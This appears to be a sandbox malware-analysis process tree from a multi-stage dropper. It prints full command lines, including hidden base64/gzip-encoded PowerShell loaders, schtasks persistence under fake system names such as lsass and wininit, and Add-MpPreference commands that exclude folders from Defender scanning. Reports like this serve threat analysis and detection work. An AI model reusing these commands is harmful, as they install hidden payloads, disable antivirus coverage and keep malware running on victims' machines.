C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
3⤵
PID:3776

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
4⤵
PID:5108

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:4552

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
5⤵
- Creates scheduled task(s)
PID:4424

C:\Users\Admin\AppData\Local\Temp\nsuB7EC.tmp
C:\Users\Admin\AppData\Local\Temp\nsuB7EC.tmp
3⤵
PID:4300

C:\Users\Admin\AppData\Local\Temp\Files\she.exe
"C:\Users\Admin\AppData\Local\Temp\Files\she.exe"
2⤵
PID:4576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDAHQAOABLAEYAMABDAEEANwBWAFcALwAyAC8AYQBSAGgAVAAvAHUAWgBYADYAUAAxAGcAVABFAHIAWgBHAHcAUwBZAGsAVABTAHQAVgBtAGcAMAAyAHQAZwBzAEUATwBHAHcAQwBHAGEAcQBNAGYAZABnAFgAegBsADkAaQBuAHcATgAwADIALwArACsAZAA0AEQAVABiAEcAMgAzAGQAdABLAHMAUgBOAHkAOQBlADEAOAAvADcANwAxADcAdAB5AGsAVABuADUARQAwAEUAYgB5AHMARgBIADUANwA5AGYATABGADIATQB1ADkAVwBCAEIAcgBzAFcARQAyAGgARgBvAHgARwAwAGsAdgBYAGcAQwA1ADkAaABnAGsAdwBuAHQAQgB2AEYATwB6AHIASgBmAEcASABrAGwAVwA3ADkANQAxAHkAegB6AEgAQwBUAHYAdABtADMAMwBNADEASwBMAEEAOABaAG8AUwBYAEkAaQBTADgATABzAHcAagAzAEMATwBYADkAKwBzADcANwBIAFAAaABOACsARQAyAHMAZABtAG4ANgBaAHIAagA1ADcAWgBEAGwAMwBQAGoANwBEAHcAVwBrADAAQwBmAGoAWgBJAGYAWQArADcAMABrAFEAWgBKAFUAeQBzAC8ALwBwAHIAWABiAHAANwByAGEAeQBhACsAawBQAHAAMABVAEsAcwBvADAAUABCAGMATgB3AE0ASwBLADEATAB3AGgAOABTAE4AegBnADcAWgBGAGkAcwBEADQAbQBmAHAAMABXADYAWQBjADAANQBTAFMANwBhAFQAUwBjAHAAdgBBADAAZQBnAGIAWgBIAFAATQBRAHMAUwBvAE8AaQBMAGsARQBRADgASgBkAGoAVgB1AGEASgB3AE0AUABoADgAcQBkAFQAcwBRADcATABjAFoANwA2AGEAaABEAGsAdQBDAGoAcQBEAGUARwBPAGEANwA1AGIAcgBYADQAUgA3ADgANQBtAHAAMgBYAEMAUwBJAHkAYgBWAHMASgB3AG4AbQBZAEkANQA0AC8ARQB4ADAAWABUADkASgBLAEEANABpAG4AZQByAEUAQQBLAHMAWgB3AGsANABVAHEAUwBnAE8AMAB4ADMAVwBLAHgAbABwAFMAVQBOAG8AUQBmAFUAUwBPAE8AOABLADQAQwA3AFgAdQBGAHgATwBkAEMAdwBEAFYAbQB1AGQAUwBBAEwASAA0AFoANQBqAEEATgBTAG8AcABQAGcAdgBXAHYAKwBNAGsAVABMADgARgAzAFQAagA3AEEAOQBzAGUAcgBsADYAOQBlAGIAcQBvADYAVwBmAGQAdgA3AFAAYgB6AFMAbwBIAFYAaQA3AHYAagBHAG8ATgB6ADQAagBnAHQAeQBKAEgAeAB2AFMAQQAzAGgAQwBIAFkAOABWAGkAYQBIADIAQgBiAG0AKwBVAGwAbABsAFoAUAAwAEEAcQAxADUAUABIAGoAeAA3AHoAeABiAFEAVgBLAHgAUQAyADgAaAAxADAARwBsAEQAcwAzAEoAYwBFAEsASgBNADcAcAByAEoAVQBhADgAagBqADkAMgAyAFgAWgB3AHgAdQBTADQATgA0AGgAOABXAEwAaQBWADUAVQBuAGYAZwAxAGsAdgBLAEgANABHAEcAUwB6AFkAaAB1AEIAVAAyAEwAOQBmAEkAQwBEAEgAcQBZADQAOQBCAGoASABqAGUAZgA2AEMAegBFADkASgB1AHgASgBWAGkAcwBKAEQAWABDAHUAKwBwAEMAbwBBAHIAeQBDAEgARQBwAC8AZABlAGEAVQBDAHIARgB1AEoAVQBNAGMAQQAwAGEAbgBQAFIAUgBmAGIAUQBQADEAagBpAHYAdQBjADQAMABmAEsAdQB0ADgARAAwAHoAMQBMAHYAVwBLAG8AaQBHAE0AUwAyAGcANAB2AHkARQBnADcARgBFAGMATgBBAFEAMQBLAGMAagA1AFMAQwAxAFoAZQBsAHoAVwBQADcAcwA3AEwAQwBrAGoAdgBsAGUAdwBTAHQAMQBLAHEAbgBBADgAMgArAHUAbQBTAGMASAB5ADAAbwBlADAAUQBlAHcAegBsAEcARwBmAGUASgBSAEQAMABSAEIATQBFAG0ARAB0AGcARQBoAFkAMgBhADEALwBGAFkAaQB1AFIAeQBuADAAQQBXAGgANgBoAEUAUQBBAGgAUQBPAEEARwBDACsARwBIAEYAdwA4AEoAVgA1AHEASQBzAHkAcwBPAEsATQA0AEIAcQBaAGoANgB4AHYAVQBDADYASABSAHoAKwBWACsATABCADgAdgB4AEUASAA5ADcAeQA1AFcAOQBYAHcAcQBYAGcANQBHAGgAYwBJAHoAQgB5AEgARABpAEsAYQBzAEkAYgBnAGsAWgAzAEMARABjAEcAQwBoAGkAdgA2AGoAKwBXAGQAMwB4ADkARwBSAGIAbwA3AFAAdQBSAEMAcgBIAHIAbgBUAEQAbwB3AFgAZABtADIAagB2AGUARQAxAGUAYwBiAGwAaQBFAEwATwBBAEEARQBqAFQAMgBQAE4ASwAvAEIAVgA1ADMAUgBQAGkARAArADEAZABOAEsANwBIAFAAZgBTAFQAeQBwADgAdQBqAEcAZAB1AEIAcAB5ADMASwBVADEARABHAHkASwBMAEkAWQBXAE8AaABrADQAVQBXAFEAUgB4AFEAcABoAGYAMwBEADAAYwBNAHoAawA3AE0ATgBzAFoAdABxAG8AWgA2AHAANQBiAHgAOQB0AFYASwB1AHcAZABGAE0ANwBUAEIAUgBOADkAVQAzAHkAeAByAFUAMQB4AHcARQA1ADAAaAAxAE0ANwB2AGUAVwBHAG0AaAB4AGUAQgBzAHUAdQBqAHQAcgBIAE4AMQBhAFkASwBnADcAQwBLADAAUQBmAGoAVQByADgAagBWADUASwBZAGUAYQBiAEgAUQBIAFMASQB0ADAASQBxAHMAaABtAHAAaQBUAGoAcgBLADAAVwB0AGQAVQBJADUAKwBRAGgAVgBSAHoALwBtAFQAdgB5AFkANwBlADYAWgBpADMAKwA1AGsANgBHAHQAcABxAFoATgB3AEUAaAB0AEkAMgBqAHYASgBiAEwAcgAvAGMAOQBnAGMAOQAvAGIAagAzACsAWAA2AHkASwBIAFMAaQBnAHgAMwBkAFcARQB6AGMAQwBNAC8AZABUAEoAdgByAHgAbgBMAGkAWgBsAGIANAA4AHkANgBjAHUASQBOAFcAeAA0AGcAMABvAEYAdABrAFAAOABoAFEAQwB6ADUARgBBAFIAegBZAEQASwAwAHYATAA3AHoANQBaAGIAYQBPAFgAUgBrAHcAbQBpAE0AcgBpAFoAQwAvADYAYwA1AE0AUAA5AFoAYQBMAGQAZABSAFIAaABiAEIAeABtAHkAKwBsAGYAYwA3AFgAZAA0AGYAMwBCAEgASQBwAEYAZAB1AEUAaQBjAGMAVgBuAFgAYwBjAHEAOQBVAG0AYQArAFUAdwBiADAAdQAzADMAUQA3AG4ANABhAGsAYwB4AGoAZQBXACsAcAA4AFMAKwB5AGQAawA1AGkANwBjAFEARwBBAGEASwBPAGgAVAAyAGQATwBPACsAMAA1AGMAbgB6AGwAZAB1AEwATgBuAHMATwBrADkAbABvAEsAagBxADcANABhAHQARAB1AEsASABQAGQALwByAEIAbwA3ADQAMABnAGQAZwAwADMAcABzAGkAUgA5AHoATQBrAEwAMwBmAHIAZABqAEQARwBqAGkAMwA3AC8AWAAyADYAdgBOAGUAcwBtAGIATwBQAC8AZgBsADEARwB6AHQAVQBXAFoAdQBHAHUAWgB4AGYAVABpAGYAYgA2AFcAQwA1AG4AUgBxAEIAcQBZADIASABjAFQAWgBCAE8AbAAwAHUANQBCAEYAQwAyADYAVwAxAGIAbAA5ADIAWgBzAGwAawBqAC8AWABvAEIAbwBJAHkAcAAzAEoARQBQAGQAbQAvAGMAQgBMADEAMAAxAG8AWgBRAGYAUQB5AGMAeABQAGEAQwA1AHoAcABoAFUAdQBVAE4AcAA1AGYATABtAGQAeAB0AGgAdwA0AEkAdwBkADAAZQA0AHYAMgA1AFIASgBOAE4ASQB2ADQASABBAHQAagB3AFgAUABtAHkASwBTAGoAOQBqADYARQAwAFIARQBJAGIAUQBKAFkAMgBmAHYAcgBRAGUANgBpAHoAcAB2AFcAVwB4AGQANABsAHcAOQBkACsAdABZAGkARwArAFAAQgBWAEQATABrAFcAUwBxAFUAbwBtAFkAVAByAEQAMQBvAGsAQgArADAAegBwAFIAcABkAHQAVwB2AGMAQQBTAGQAcQBxAE4AawBuAEoAOQBqAGQAYwBKAEwAQgB2AHkASQAzAE8AKwBiAGoAeQAxAGwAYwBhAHMARwAwADcAZgBXAC8AcgBwAHYANgBUAHQAVgBCAFgAbgA5AHUAbgBjAGIAVgB2AEoAbwAzAEIAbwBIADYAaQBCAC8ASwBDAE8AWABrAHgAeQBGAFAAawB5AE0AegBDAFkAQQBTAEMAZgBTAHcARABkAG8AQQAvAFUAbwB0ADgAaQBNAE0AWAAyAFMAcwAwAGQAZwBoADkAaQBYADgASAAvAHQARQBMAHUAOQBCAFoAdQBxAEcAaAA1ADkAMwBWAEMANwBqAEQANwBNAEMAYgBhAE8ANwBEAHkAdQA4AEgAbwBTADgAdABvAHUAWQBtACsAZwBRAFgAMwB2AE8AdQBCAFgAWQBDADkAMgBTAHYAUwBnAEcAcABSAGoAcwBHAE8AZQBQAFcAKwA5AGQAZAA3AC8AeABOAHMAYgArAHIAdQBXAEIAcwArADYAOQBsAHMAagBkACsAagBsAFIAZQBSAFIANgBHAFkAWQBwAHQAVQBkAGEAcQBTADUAYwBSADYAUQA0ADUAUgB3AEMAVgBIAGsARAA2AG8AdAB6AGgATgBNADQAVQBVAEMAYgA1AGIAcQBHAGwASQBwAFQAWAAwACsAbgBFACsAVABGAEYANABHAHAAMwBuAE4AbgB3ADgATwBMAEMALwBhAFgAMQAxAEoAdwBoAE8AagA5AEgAbABzAFYANgBSADMANwA1AGIAZwBKAFoAOABjADIAcAB2AG0AQQBDAGMAaABpAHgAcgB5AC8AawBLAFcAWQBRAGIATAArADQANABNAEkAWAA1AC8AWQBOADAAMABPADQAaABjAFUANABPAFAAYwBJAEQAbAByAEoAYwBlADkAVQByADgAcQBxAHYAUgBjAHAAagA4AHIAMgBpAGQANwA5AGMASQBmAG8ASgAvAFIAZQBzAHoANwBSADkATwB2AHcAdABCAHUAYwBIAGoALwBZAEwANABWADgASQBQAG8AZgBtAGoAZwBjADgAOQB3AG8AQQBSAHcAWAB5AGcAKwBQAFIAQwArAFUAYgA4ADUAOABKADQAOQBvAGoAagBXAFkARwA4AGIAOAA0AGYAZgA0AFAAZgBsAE8AegAxAEMATgA1ADIAcgAxADcAKwBDAFEAZABYAFAAMQBqAHIAQwB3AEEAQQAnACcAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
3⤵
PID:4432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
4⤵
PID:3388

C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe"
2⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe"
3⤵
PID:3668

C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe
"C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"
2⤵
PID:2748

C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
2⤵
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 216
3⤵
- Program crash
PID:3384

C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"
2⤵
PID:3276

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp43B5.tmp.bat""
3⤵
PID:1780

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:4876

C:\ProgramData\common\JTPFKOXW.exe
"C:\ProgramData\common\JTPFKOXW.exe"
4⤵
PID:3076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
PID:5096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:3804

C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe
"C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe"
2⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
PID:3852

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
2⤵
PID:4000

C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
3⤵
PID:2256

C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\app1.exe"
2⤵
PID:4120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Recovery\9064cc02-9ba8-11ee-8a7b-e6b52eba4e86\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\9064cc02-9ba8-11ee-8a7b-e6b52eba4e86\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\9064cc02-9ba8-11ee-8a7b-e6b52eba4e86\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PresentationFontCacheP" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Favorites\PresentationFontCache.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PresentationFontCache" /sc ONLOGON /tr "'C:\Users\All Users\Favorites\PresentationFontCache.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PresentationFontCacheP" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Favorites\PresentationFontCache.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\DriverHostCrtNet\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\DriverHostCrtNet\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\security\templates\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\security\templates\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Windows\security\templates\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2312

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:1596

C:\Program Files (x86)\Gsoymaq.exe
"C:\Program Files (x86)\Gsoymaq.exe"
1⤵
PID:2124

C:\Program Files (x86)\Gsoymaq.exe
"C:\Program Files (x86)\Gsoymaq.exe" Win7
2⤵
PID:2612

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4384

C:\Windows\system32\taskeng.exe
taskeng.exe {ABD8C27E-2277-4AC7-BE77-94BC9C2041C8} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]
1⤵
PID:3224

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
2⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\Files\Atqumy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Atqumy.exe"
2⤵
PID:1408

C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
2⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
3⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\Files\Setup11.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Setup11.exe"
2⤵
PID:4744

C:\Users\Admin\AppData\Local\Temp\Files\gold1201001.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gold1201001.exe"
2⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 608
3⤵
- Program crash
PID:2968

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
"C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
2⤵
PID:2952

C:\Users\Admin\AppData\Local\Temp\Files\legend1234ff.exe
"C:\Users\Admin\AppData\Local\Temp\Files\legend1234ff.exe"
2⤵
PID:844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe
"C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe"
2⤵
PID:3328

C:\Users\Admin\AppData\Local\Temp\Files\for.exe
"C:\Users\Admin\AppData\Local\Temp\Files\for.exe"
2⤵
PID:4344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2276

C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
4⤵
PID:4892

C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"
4⤵
PID:2292

C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3_1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3_1.exe"
2⤵
PID:4140

C:\Users\Admin\AppData\Local\Temp\Files\pixxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pixxxxx.exe"
2⤵
PID:552

C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
2⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
2⤵
PID:3244

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

T1064

